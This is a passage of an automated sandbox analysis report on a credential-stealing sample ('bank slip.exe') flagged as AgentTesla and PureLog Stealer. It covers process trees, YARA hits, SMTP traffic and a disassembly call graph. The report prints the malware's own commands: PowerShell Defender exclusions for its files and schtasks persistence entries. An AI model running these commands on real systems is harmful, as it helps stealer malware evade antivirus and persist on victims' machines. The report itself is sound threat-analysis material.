                                                                    May 6, 2024 08:14:43.776997089 CEST49712587192.168.2.5111.118.215.27QUIT
                                                                    May 6, 2024 08:14:44.306164026 CEST58749712111.118.215.27192.168.2.5221 bh-in-12.webhostbox.net closing connection

                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:08:12:48
                                                                    Start date:06/05/2024
                                                                    Path:C:\Users\user\Desktop\bank slip.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\bank slip.exe"
                                                                    Imagebase:0x1b0000
                                                                    File size:745'480 bytes
                                                                    MD5 hash:64FF7F01E8A040DD0708D0D3C72A09F7
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2074900045.0000000006750000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2071630541.0000000002916000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2071630541.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2072649003.000000000389C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2072649003.000000000389C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:3
                                                                    Start time:08:12:49
                                                                    Start date:06/05/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\bank slip.exe"
                                                                    Imagebase:0xd70000
                                                                    File size:433'152 bytes
                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:4
                                                                    Start time:08:12:50
                                                                    Start date:06/05/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:5
                                                                    Start time:08:12:50
                                                                    Start date:06/05/2024
                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe"
                                                                    Imagebase:0xd70000
                                                                    File size:433'152 bytes
                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:6
                                                                    Start time:08:12:50
                                                                    Start date:06/05/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:7
                                                                    Start time:08:12:50
                                                                    Start date:06/05/2024
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp2859.tmp"
                                                                    Imagebase:0x5f0000
                                                                    File size:187'904 bytes
                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:8
                                                                    Start time:08:12:50
                                                                    Start date:06/05/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:9
                                                                    Start time:08:12:52
                                                                    Start date:06/05/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                    Imagebase:0xcc0000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2091471993.000000000304A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2091471993.0000000003042000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2091471993.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2091471993.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2088618533.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2088618533.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:10
                                                                    Start time:08:12:55
                                                                    Start date:06/05/2024
                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                    Imagebase:0x7ff6ef0c0000
                                                                    File size:496'640 bytes
                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:11
                                                                    Start time:08:12:57
                                                                    Start date:06/05/2024
                                                                    Path:C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Roaming\mKSjGvfmIulVB.exe
                                                                    Imagebase:0xc10000
                                                                    File size:745'480 bytes
                                                                    MD5 hash:64FF7F01E8A040DD0708D0D3C72A09F7
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2121255868.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2121255868.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2126436227.00000000042DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2126436227.00000000042DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 24%, ReversingLabs
                                                                    • Detection: 38%, Virustotal, Browse
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:12
                                                                    Start time:08:12:59
                                                                    Start date:06/05/2024
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mKSjGvfmIulVB" /XML "C:\Users\user\AppData\Local\Temp\tmp4AB6.tmp"
                                                                    Imagebase:0x5f0000
                                                                    File size:187'904 bytes
                                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:13
                                                                    Start time:08:12:59
                                                                    Start date:06/05/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:14
                                                                    Start time:08:12:59
                                                                    Start date:06/05/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                    Imagebase:0xd70000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3246056841.0000000003092000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3246056841.000000000309A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.3246056841.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000E.00000002.3246056841.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:15
                                                                    Start time:08:13:07
                                                                    Start date:06/05/2024
                                                                    Path:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                                                                    Imagebase:0xec0000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 0%, ReversingLabs
                                                                    • Detection: 0%, Virustotal, Browse
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:16
                                                                    Start time:08:13:07
                                                                    Start date:06/05/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:18
                                                                    Start time:08:13:16
                                                                    Start date:06/05/2024
                                                                    Path:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                                                                    Imagebase:0xb0000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:19
                                                                    Start time:08:13:16
                                                                    Start date:06/05/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff6d64d0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:11.3%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:3.4%
                                                                      Total number of Nodes:147
                                                                      Total number of Limit Nodes:9
                                                                      execution_graph 33429 2594668 33430 2594672 33429->33430 33434 2594759 33429->33434 33439 2594218 33430->33439 33432 259468d 33435 259477d 33434->33435 33443 2594859 33435->33443 33447 2594868 33435->33447 33440 2594223 33439->33440 33455 2597d14 33440->33455 33442 2597fdc 33442->33432 33445 259488f 33443->33445 33444 259496c 33445->33444 33451 25944e0 33445->33451 33449 259488f 33447->33449 33448 259496c 33448->33448 33449->33448 33450 25944e0 CreateActCtxA 33449->33450 33450->33448 33452 25958f8 CreateActCtxA 33451->33452 33454 25959bb 33452->33454 33456 2597d1f 33455->33456 33459 2597d74 33456->33459 33458 25981fd 33458->33442 33460 2597d7f 33459->33460 33461 2597da4 CreateWindowExW 33460->33461 33462 25986ea 33461->33462 33462->33458 33463 259b618 33466 259b700 33463->33466 33464 259b627 33467 259b721 33466->33467 33468 259b744 33466->33468 33467->33468 33474 259b999 33467->33474 33478 259b9a8 33467->33478 33468->33464 33469 259b73c 33469->33468 33470 259b948 GetModuleHandleW 33469->33470 33471 259b975 33470->33471 33471->33464 33475 259b9bc 33474->33475 33476 259b9e1 33475->33476 33482 259ac60 33475->33482 33476->33469 33479 259b9bc 33478->33479 33480 259ac60 LoadLibraryExW 33479->33480 33481 259b9e1 33479->33481 33480->33481 33481->33469 33483 259bb88 LoadLibraryExW 33482->33483 33485 259bc01 33483->33485 33485->33476 33486 259d998 33487 259d9de 33486->33487 33490 259db78 33487->33490 33493 259ce80 33490->33493 33494 259dbe0 DuplicateHandle 33493->33494 33495 259dacb 33494->33495 33502 6a12f40 33505 6a12f5a 33502->33505 33503 6a12f7e 33505->33503 33506 6a133c5 33505->33506 33509 68afc30 33506->33509 33507 6a133f5 33510 68afcb9 CreateProcessA 33509->33510 33512 68afe7b 33510->33512 33513 6a141d0 33514 6a1435b 33513->33514 33515 6a141f6 33513->33515 33515->33514 33517 6a12680 33515->33517 33518 6a14450 PostMessageW 33517->33518 33519 6a144bc 33518->33519 33519->33515 33353 4ba7c98 33354 4ba7cc7 33353->33354 33361 4ba73ec 33354->33361 33356 4ba7d2e 33358 4ba8493 33356->33358 33366 259873b 33356->33366 33370 2597da4 33356->33370 33357 4ba958c 33362 4ba73f7 33361->33362 33364 259873b CreateWindowExW 33362->33364 33365 2597da4 CreateWindowExW 33362->33365 33363 4ba958c 33363->33356 33364->33363 33365->33363 33367 2598773 33366->33367 33374 2598290 33367->33374 33369 25987e5 33369->33357 33371 2597daf 33370->33371 33372 2598290 CreateWindowExW 33371->33372 33373 25987e5 33372->33373 33373->33357 33375 259829b 33374->33375 33376 2598f61 33375->33376 33378 259d6d0 33375->33378 33376->33369 33379 259d6f1 33378->33379 33380 259d715 33379->33380 33382 259d880 33379->33382 33380->33376 33383 259d88d 33382->33383 33385 259d8c7 33383->33385 33386 259cdb8 33383->33386 33385->33380 33387 259cdc3 33386->33387 33389 259e5e0 33387->33389 33390 259e1a0 33387->33390 33391 259e1ab 33390->33391 33392 2598290 CreateWindowExW 33391->33392 33393 259e64f 33392->33393 33397 4ba0443 33393->33397 33403 4ba0448 33393->33403 33394 259e689 33394->33389 33399 4ba0479 33397->33399 33400 4ba0579 33397->33400 33398 4ba0485 33398->33394 33399->33398 33409 4ba128f 33399->33409 33414 4ba12a0 33399->33414 33400->33394 33404 4ba0579 33403->33404 33406 4ba0479 33403->33406 33404->33394 33405 4ba0485 33405->33394 33406->33405 33407 4ba128f CreateWindowExW 33406->33407 33408 4ba12a0 CreateWindowExW 33406->33408 33407->33404 33408->33404 33410 4ba12cb 33409->33410 33411 4ba137a 33410->33411 33419 4ba2180 33410->33419 33422 4ba2170 33410->33422 33415 4ba12cb 33414->33415 33416 4ba137a 33415->33416 33417 4ba2180 CreateWindowExW 33415->33417 33418 4ba2170 CreateWindowExW 33415->33418 33417->33416 33418->33416 33425 4ba0190 33419->33425 33423 4ba21b5 33422->33423 33424 4ba0190 CreateWindowExW 33422->33424 33423->33411 33424->33423 33426 4ba21d0 CreateWindowExW 33425->33426 33428 4ba22f4 33426->33428 33328 9fd01c 33329 9fd034 33328->33329 33330 9fd08e 33329->33330 33335 4ba237b 33329->33335 33339 4ba01bc 33329->33339 33343 4ba30e8 33329->33343 33347 4ba2388 33329->33347 33336 4ba23ae 33335->33336 33337 4ba01bc CallWindowProcW 33336->33337 33338 4ba23cf 33337->33338 33338->33330 33340 4ba01c7 33339->33340 33342 4ba3149 33340->33342 33351 4ba02e4 CallWindowProcW 33340->33351 33345 4ba3125 33343->33345 33346 4ba3149 33345->33346 33352 4ba02e4 CallWindowProcW 33345->33352 33348 4ba23ae 33347->33348 33349 4ba01bc CallWindowProcW 33348->33349 33350 4ba23cf 33349->33350 33350->33330 33351->33342 33352->33346 33496 4ba4771 33497 4ba488c 33496->33497 33498 4ba47e2 33496->33498 33500 4ba01bc CallWindowProcW 33497->33500 33499 4ba483a CallWindowProcW 33498->33499 33501 4ba47e9 33498->33501 33499->33501 33500->33501

                                                                      Executed Functions

                                                                      Function 04BA7C98 Relevance: 20.4, Strings: 15, Instructions: 1621COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 311 4ba7c98-4ba7fdc call 4ba73ec call 4ba73fc call 4ba7688 * 2 call 4ba73fc call 4ba7688 * 4 call 4ba7698 * 2 call 4ba76a8 call 4ba76b8 375 4ba7fe2-4ba800b 311->375 376 4ba8135-4ba841d call 4ba76c8 call 4ba76d8 call 4ba76e8 call 4ba76f8 call 4ba7708 call 4ba7718 call 4ba7728 call 4ba7738 call 4ba39f4 311->376 379 4ba802d-4ba8039 375->379 380 4ba800d-4ba801b 375->380 382 4ba9459-4ba9585 376->382 516 4ba8423-4ba843c 376->516 385 4ba803b 379->385 386 4ba806f-4ba807b 379->386 380->382 383 4ba8021-4ba802b 380->383 717 4ba9587 call 259873b 382->717 718 4ba9587 call 2597da4 382->718 383->379 383->380 387 4ba803e-4ba8057 385->387 388 4ba807d-4ba8086 386->388 389 4ba80c3-4ba80cf 386->389 387->382 392 4ba805d-4ba806d 387->392 393 4ba8089-4ba80ab 388->393 389->382 394 4ba80d5-4ba80fd 389->394 392->386 392->387 393->382 397 4ba80b1-4ba80c1 393->397 394->382 395 4ba8103-4ba812f 394->395 395->375 395->376 397->389 397->393 411 4ba958c-4ba9594 414 4ba959a-4ba969e call 4ba7b4c * 6 411->414 415 4ba96a3-4ba96aa 411->415 421 4ba9759-4ba9785 414->421 415->421 422 4ba96b0-4ba96e5 415->422 428 4ba97be-4ba97cc call 4ba7b6c 421->428 429 4ba9787-4ba97a2 call 4ba7b5c 421->429 422->421 455 4ba96e7-4ba9751 422->455 439 4ba97d8 428->439 440 4ba97ce-4ba97d6 428->440 429->428 450 4ba97a4-4ba97b6 429->450 444 4ba97da-4ba97dc 439->444 440->444 448 4ba97de-4ba97e7 call 4ba7b5c 444->448 449 4ba97ec-4ba986a call 4ba7b5c 444->449 448->449 722 4ba986d call 4baac5a 449->722 723 4ba986d call 4baac68 449->723 450->428 455->421 497 4ba9870-4ba9886 501 4ba9888-4ba98a0 497->501 502 4ba98a6-4ba98d5 call 4ba7b7c 497->502 501->502 719 4ba98da call 4baccef 502->719 720 4ba98da call 4bacd00 502->720 721 4ba98da call 4bacd86 502->721 514 4ba98df-4ba98e6 516->382 518 4ba8442-4ba8472 516->518 518->382 521 4ba8478-4ba848d 518->521 521->382 523 4ba8493-4ba84c6 521->523 526 4ba84cc-4ba856b call 4ba7748 523->526 535 4ba856d-4ba8573 526->535 536 4ba8583-4ba9458 call 4ba7758 call 4ba7768 * 3 call 4ba7748 call 4ba7758 call 4ba7768 call 4ba7778 call 4ba7788 call 4ba7768 call 4ba7798 call 4ba7748 call 4ba7768 call 4ba7798 call 4ba7778 call 4ba7788 call 4ba7768 call 4ba7798 call 4ba7768 call 4ba7798 call 4ba7758 call 4ba7768 call 4ba7758 call 4ba7768 call 4ba7708 call 4ba7718 call 4ba7728 call 4ba77a8 call 4ba77b8 call 4ba77c8 call 4ba77d8 call 4ba77e8 call 4ba77f8 call 4ba7884 call 4ba7708 call 4ba7718 call 4ba7728 call 4ba7738 call 4ba7708 call 4ba7718 call 4ba7728 call 4ba7738 call 4ba7894 call 4ba78a4 call 4ba78b4 call 4ba78c4 call 4ba78d4 call 4ba7884 * 3 call 4ba78e4 call 4ba7718 call 4ba78f4 * 2 526->536 537 4ba8577-4ba8579 535->537 538 4ba8575 535->538 537->536 538->536 717->411 718->411 719->514 720->514 721->514 722->497 723->497
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2074216014.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ba0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ($($-$-$-$-$.$.$.$.$.$.$0$d$r
                                                                      • API String ID: 0-3407198415
                                                                      • Opcode ID: 3b72f0491fa1c29c8a1424ddb71e3ed5be63a31a1783d9dbfde8005aca8466b9
                                                                      • Instruction ID: 5c67a05685036d68e3a459a765eb9b05aaff58613f7f0e6b8c8c6db91aaedefb
                                                                      • Opcode Fuzzy Hash: 3b72f0491fa1c29c8a1424ddb71e3ed5be63a31a1783d9dbfde8005aca8466b9
                                                                      • Instruction Fuzzy Hash: B403F334A142158FDB15DF28C894BD9B7B2FF89304F1585E9E909AB361DB31AE85CF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 04BA7C70 Relevance: 20.1, Strings: 15, Instructions: 1375COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 724 4ba7c70-4ba7c91 726 4ba7c42-4ba7c64 724->726 727 4ba7c93-4ba7d1b 724->727 735 4ba7d25-4ba7d29 call 4ba73ec 727->735 737 4ba7d2e-4ba7d63 call 4ba73fc 735->737 743 4ba7d6d-4ba7d71 call 4ba7688 737->743 745 4ba7d76-4ba7fdc call 4ba7688 call 4ba73fc call 4ba7688 * 4 call 4ba7698 * 2 call 4ba76a8 call 4ba76b8 743->745 792 4ba7fe2-4ba800b 745->792 793 4ba8135-4ba82a2 call 4ba76c8 call 4ba76d8 call 4ba76e8 call 4ba76f8 745->793 796 4ba802d-4ba8039 792->796 797 4ba800d-4ba801b 792->797 888 4ba82ac-4ba82b1 793->888 802 4ba803b 796->802 803 4ba806f-4ba807b 796->803 799 4ba9459-4ba9514 797->799 800 4ba8021-4ba802b 797->800 826 4ba951e-4ba9585 799->826 800->796 800->797 804 4ba803e-4ba8057 802->804 805 4ba807d-4ba8086 803->805 806 4ba80c3-4ba80cf 803->806 804->799 809 4ba805d-4ba806d 804->809 810 4ba8089-4ba80ab 805->810 806->799 811 4ba80d5-4ba80fd 806->811 809->803 809->804 810->799 814 4ba80b1-4ba80c1 810->814 811->799 812 4ba8103-4ba812f 811->812 812->792 812->793 814->806 814->810 1134 4ba9587 call 259873b 826->1134 1135 4ba9587 call 2597da4 826->1135 828 4ba958c-4ba9594 831 4ba959a-4ba969e call 4ba7b4c * 6 828->831 832 4ba96a3-4ba96aa 828->832 838 4ba9759-4ba9785 831->838 832->838 839 4ba96b0-4ba96e5 832->839 845 4ba97be-4ba97cc call 4ba7b6c 838->845 846 4ba9787-4ba97a2 call 4ba7b5c 838->846 839->838 872 4ba96e7-4ba9751 839->872 856 4ba97d8 845->856 857 4ba97ce-4ba97d6 845->857 846->845 867 4ba97a4-4ba97b6 846->867 861 4ba97da-4ba97dc 856->861 857->861 865 4ba97de-4ba97e7 call 4ba7b5c 861->865 866 4ba97ec-4ba985b call 4ba7b5c 861->866 865->866 912 4ba9864-4ba986a 866->912 867->845 872->838 891 4ba82b9-4ba8307 call 4ba7708 call 4ba7718 888->891 900 4ba830c-4ba8347 call 4ba7728 891->900 904 4ba834c-4ba83d0 call 4ba7738 call 4ba39f4 900->904 925 4ba83d7-4ba83ef 904->925 1139 4ba986d call 4baac5a 912->1139 1140 4ba986d call 4baac68 912->1140 914 4ba9870-4ba9879 917 4ba987f-4ba9886 914->917 918 4ba9888-4ba98a0 917->918 919 4ba98a6-4ba98c1 917->919 918->919 927 4ba98ca-4ba98d5 call 4ba7b7c 919->927 926 4ba83f5-4ba8401 925->926 930 4ba840b-4ba8413 926->930 1136 4ba98da call 4baccef 927->1136 1137 4ba98da call 4bacd00 927->1137 1138 4ba98da call 4bacd86 927->1138 932 4ba8419-4ba841d 930->932 931 4ba98df-4ba98e6 932->799 933 4ba8423-4ba843c 932->933 933->799 935 4ba8442-4ba8472 933->935 935->799 938 4ba8478-4ba848d 935->938 938->799 940 4ba8493-4ba84aa 938->940 942 4ba84b4-4ba84c6 940->942 943 4ba84cc-4ba856b call 4ba7748 942->943 952 4ba856d-4ba8573 943->952 953 4ba8583-4ba9458 call 4ba7758 call 4ba7768 * 3 call 4ba7748 call 4ba7758 call 4ba7768 call 4ba7778 call 4ba7788 call 4ba7768 call 4ba7798 call 4ba7748 call 4ba7768 call 4ba7798 call 4ba7778 call 4ba7788 call 4ba7768 call 4ba7798 call 4ba7768 call 4ba7798 call 4ba7758 call 4ba7768 call 4ba7758 call 4ba7768 call 4ba7708 call 4ba7718 call 4ba7728 call 4ba77a8 call 4ba77b8 call 4ba77c8 call 4ba77d8 call 4ba77e8 call 4ba77f8 call 4ba7884 call 4ba7708 call 4ba7718 call 4ba7728 call 4ba7738 call 4ba7708 call 4ba7718 call 4ba7728 call 4ba7738 call 4ba7894 call 4ba78a4 call 4ba78b4 call 4ba78c4 call 4ba78d4 call 4ba7884 * 3 call 4ba78e4 call 4ba7718 call 4ba78f4 * 2 943->953 954 4ba8577-4ba8579 952->954 955 4ba8575 952->955 954->953 955->953 1134->828 1135->828 1136->931 1137->931 1138->931 1139->914 1140->914
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2074216014.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_4ba0000_bank slip.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ($($-$-$-$-$.$.$.$.$.$.$0$d$r
                                                                      • API String ID: 0-3407198415
                                                                      • Opcode ID: 758df12ca34f4340bda63c25c48016aa0cbcc968ced645a0b50d3d2f79dce8eb
                                                                      • Instruction ID: b1d3c7f40b758c37d031331eb3a04cdc0cba50bdd4da04f36f1d115aa614b846
                                                                      • Opcode Fuzzy Hash: 758df12ca34f4340bda63c25c48016aa0cbcc968ced645a0b50d3d2f79dce8eb
